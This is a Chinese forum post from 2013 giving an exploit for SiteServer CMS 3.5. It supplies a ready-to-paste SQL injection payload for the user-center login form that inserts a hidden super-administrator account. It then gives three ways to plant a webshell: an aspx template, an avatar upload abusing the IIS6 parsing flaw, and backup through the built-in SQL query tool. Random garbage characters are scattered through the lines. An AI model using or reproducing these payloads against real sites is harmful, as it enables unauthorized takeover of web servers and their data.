经测试秒杀最新的3.5版+ f* r5 ^1 n5 D5 V8 R* U6 j* M
stieserver官网:www.siteserver.cn+ E$ |* c9 K% A, C
EXP:* w6 u* [; I; z( E _8 X9 D' J6 l6 w$ `
直接访问UserCenter/login.aspx, Z0 F3 ?5 M2 `0 S1 A; }
用户名处输入:" L2 I- P( \0 j( O( B& A6 r% \' q9 Y
% e5 }0 I" ^4 A& r" X! `8 O0 f123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–, [4 C2 J8 g2 ]6 P' l9 |8 }
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。; R, ~3 f' m, r: G! Q
之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ R/ x5 I6 _) u& G6 Q: l0 n4 {7 w! r后台拿webshell的三种方法:
" _1 E6 o% z* [" M一、
2 V4 ?! O. ?. Z# a E5 K$ l4 G站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 a" I2 \# Q8 D0 ^' p二、5 }( Q' ?1 v8 S1 M5 ~( t- C J0 ^
成员权限-》添加用户-》用户名为:1.asp
+ g t$ d9 y' o7 y' P! V4 Chttp://127.0.0.1/usercenter/
( ]" ~( N7 r. E9 G6 E7 `1 H) Q用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell0 p( P. O: y6 U, D
(ps:后台添加用户时不会验证是否含有非法字符)
6 x4 I1 G! e7 ]# Y1 I三、
; ?$ ]/ K+ ?% L% d. |系统工具-》实用工具-》机器参数查看
: @: p9 Z6 g, k6 g0 U3 p可以看到数据库类型、名称,WEB路径
! f& b) z! k2 M/ {$ c/ `% G7 @系统工具-》数据库工具-》SQL语句查询
% ~- v* M# _5 D这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对